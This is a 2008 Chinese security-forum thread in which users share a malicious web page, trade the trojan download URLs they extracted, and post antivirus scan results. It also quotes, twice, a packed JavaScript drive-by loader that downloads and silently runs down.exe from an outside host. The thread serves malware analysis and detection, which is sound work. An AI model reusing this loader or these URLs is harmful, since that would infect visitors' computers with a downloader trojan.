发个毒网！

显示全部楼层 · 发表于 2008-1-25 00:36:42

http://1.100190.com/d.htm
又见ms06014 和 real
不会解！麻烦解下

[ 本帖最后由 ask5 于 2008-1-25 00:40 编辑 ]

显示全部楼层 · 发表于 2008-1-25 00:56:58

hxxp://1.xks08.com/down.cab
hxxp://1.xks08.com/down.exe
hxxp://1.111281.com/down.exe
应该还有

[ 本帖最后由 rappar 于 2008-1-25 01:05 编辑 ]

显示全部楼层 · 发表于 2008-1-25 01:07:06

水平有限只能解出http://1.111281.com/down.exe

楼上hxxp://1.xks08.com/down.cab和hxxp://1.xks08.com/down.exe是怎样解出来的？

[ 本帖最后由 tanlimo 于 2008-1-25 01:17 编辑 ]

显示全部楼层 · 发表于 2008-1-25 01:50:27

看来是过卡巴的：

显示全部楼层 · 发表于 2008-1-25 02:02:37

I:\virus\test\down(1).exe - Signature 'Trojan-Downloader.Win32.Small.hsh' found
I:\virus\test\down.exe - Signature 'Trojan-Downloader.Win32.Small.hsh' found

2 Files scanned
(0 Archives with 0 files)
2 Signatures found
0 Suspect code-parts found
Used time: 0:00.063

显示全部楼层 · 发表于 2008-1-25 07:03:26

Antivirus Version Last Update Result
AhnLab-V3 2008.1.24.11 2008.01.24 -
AntiVir 7.6.0.48 2008.01.24 TR/Dldr.Apher.Y
Authentium 4.93.8 2008.01.24 Possibly a new variant of W32/NewMalware-Rootkit-PX-based!Maximus
Avast 4.7.1098.0 2008.01.23 -
AVG 7.5.0.516 2008.01.24 Downloader.Generic6.AELN
BitDefender 7.2 2008.01.24 Dropped:Generic.Malware.dld!!.0EBCE9BA
CAT-QuickHeal 9.00 2008.01.23 -
ClamAV 0.91.2 2008.01.24 -
DrWeb 4.44.0.09170 2008.01.24 -
eSafe 7.0.15.0 2008.01.16 suspicious Trojan/Worm
eTrust-Vet 31.3.5482 2008.01.24 Win32/Zuten!generic
Ewido 4.0 2008.01.24 Downloader.Small.hsh
FileAdvisor 1 2008.01.24 -
Fortinet 3.14.0.0 2008.01.24 -
F-Prot 4.4.2.54 2008.01.24 W32/NewMalware-Rootkit-PX-based!Maximus
F-Secure 6.70.13260.0 2008.01.24 W32/DLoader.FHMF
Ikarus T3.1.1.20 2008.01.24 Trojan-Downloader.Win32.Small.hsh
Kaspersky 7.0.0.125 2008.01.24 Trojan-Downloader.Win32.Small.hsh
McAfee 5214 2008.01.23 Generic Downloader.u
Microsoft 1.3109 2008.01.24 Trojan:Win32/Agent.ZAN
NOD32v2 2819 2008.01.24 -
Norman 5.80.02 2008.01.23 W32/DLoader.FHMF
Panda 9.0.0.4 2008.01.23 Trj/Downloader.SEG
Prevx1 V2 2008.01.24 -
Rising 20.28.31.00 2008.01.24 -
Sophos 4.24.0 2008.01.24 -
Sunbelt 2.2.907.0 2008.01.23 -
Symantec 10 2008.01.24 Infostealer
TheHacker 6.2.9.196 2008.01.23 Trojan/Downloader.Small.hsh
VBA32 3.12.2.5 2008.01.21 Trojan-Downloader.Win32.Small.hsh
VirusBuster 4.3.26:9 2008.01.23 -

显示全部楼层 · 发表于 2008-1-25 07:19:54

都是一个东西
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\down(1).exe'
C:\TDDOWNLOAD\
  down(1).exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/Dldr.Apher.Y
         [WARNING] Infected files in archives cannot be repaired!
   [INFO]    The file was deleted!
Begin scan in 'C:\TDDOWNLOAD\down.exe'
C:\TDDOWNLOAD\
  down.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/Dldr.Apher.Y
         [WARNING] Infected files in archives cannot be repaired!
   [INFO]    The file was deleted!

End of the scan: 2008年1月24日  15:19
Used time: 00:05 min

The scan has been done completely.

   0 Scanning directories
   2 Files were scanned
   2 viruses and/or unwanted programs were found
   0 Files were classified as suspicious:
   2 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   0 Files not concerned
   2 Archives were scanned
   2 Warnings
   0 Notes

显示全部楼层 · 发表于 2008-1-25 09:26:16

终于学会用FRESHOW了解出
http://1.xks08.com/Baidu.exe
http://1.111281.com/down.exe
还有几个网页不知道怎么解
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--)d[c]=k[c]||c;k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('14 27="39://1.40.37/38.43";44{14 11=18.41("\\21\\12\\7\\23\\5"+"\\10\\5\\22\\9"+"\\6\\42\\21"+"\\36\\35\\16\\16\\32","");11.34("\\33\\25\\16",27,0);11.53();8.52=1;8.56();8.55(11.54);17="\\6\\6\\20\\20\\13\\9\\24\\10\\3\\23\\6\\7\\5\\26";8["\\10\\19\\47\\3"+"\\9\\5"+"\\22\\12\\4\\3"](17,2);8["\\7\\4\\5\\10\\3"]();14 31=18.50("\\29\\30\\3\\4\\4"+"\\6\\49\\15\\15"+"\\4\\12\\7\\19\\9\\12\\5\\13","");31["\\29\\30\\3\\4\\4"+"\\25\\28\\3\\7\\24\\9\\3"]("\\7\\26\\46\\6\\3\\28\\3","/51 "+17,"","\\5\\15\\3\\13",0)}48(45){}',10,57,'|||x65|x6c|x6f|x2e|x63|as|x74|x73|xml|x69|x6e|var|x70|x54|path|ado|x61|x5c|x4d|x66|x72|x75|x45|x6d|url|x78|x53|x68|shell|x50|x47|Open|x48|x4c|com|down|http|111281|CreateObject|x58|exe|try|e|x64|x76|catch|x41|createobject|c|type|Send|responseBody|write|open'.split('|'),0,{}))

[ 本帖最后由 chenrui19930 于 2008-1-25 09:32 编辑 ]

显示全部楼层 · 发表于 2008-1-25 10:57:11

又是红伞能干掉的。

显示全部楼层 · 发表于 2008-1-25 11:07:59

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--)d[c]=k[c]||c;k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('14 27="39://1.40.37/38.43";44{14 11=18.41("\\21\\12\\7\\23\\5"+"\\10\\5\\22\\9"+"\\6\\42\\21"+"\\36\\35\\16\\16\\32","");11.34("\\33\\25\\16",27,0);11.53();8.52=1;8.56();8.55(11.54);17="\\6\\6\\20\\20\\13\\9\\24\\10\\3\\23\\6\\7\\5\\26";8["\\10\\19\\47\\3"+"\\9\\5"+"\\22\\12\\4\\3"](17,2);8["\\7\\4\\5\\10\\3"]();14 31=18.50("\\29\\30\\3\\4\\4"+"\\6\\49\\15\\15"+"\\4\\12\\7\\19\\9\\12\\5\\13","");31["\\29\\30\\3\\4\\4"+"\\25\\28\\3\\7\\24\\9\\3"]("\\7\\26\\46\\6\\3\\28\\3","/51 "+17,"","\\5\\15\\3\\13",0)}48(45){}',10,57,'|||x65|x6c|x6f|x2e|x63|as|x74|x73|xml|x69|x6e|var|x70|x54|path|ado|x61|x5c|x4d|x66|x72|x75|x45|x6d|url|x78|x53|x68|shell|x50|x47|Open|x48|x4c|com|down|http|111281|CreateObject|x58|exe|try|e|x64|x76|catch|x41|createobject|c|type|Send|responseBody|write|open'.split('|'),0,{}))

1.111281.com/down.exe

[已鉴定] 发个毒网！

回复 8楼 chenrui19930 的帖子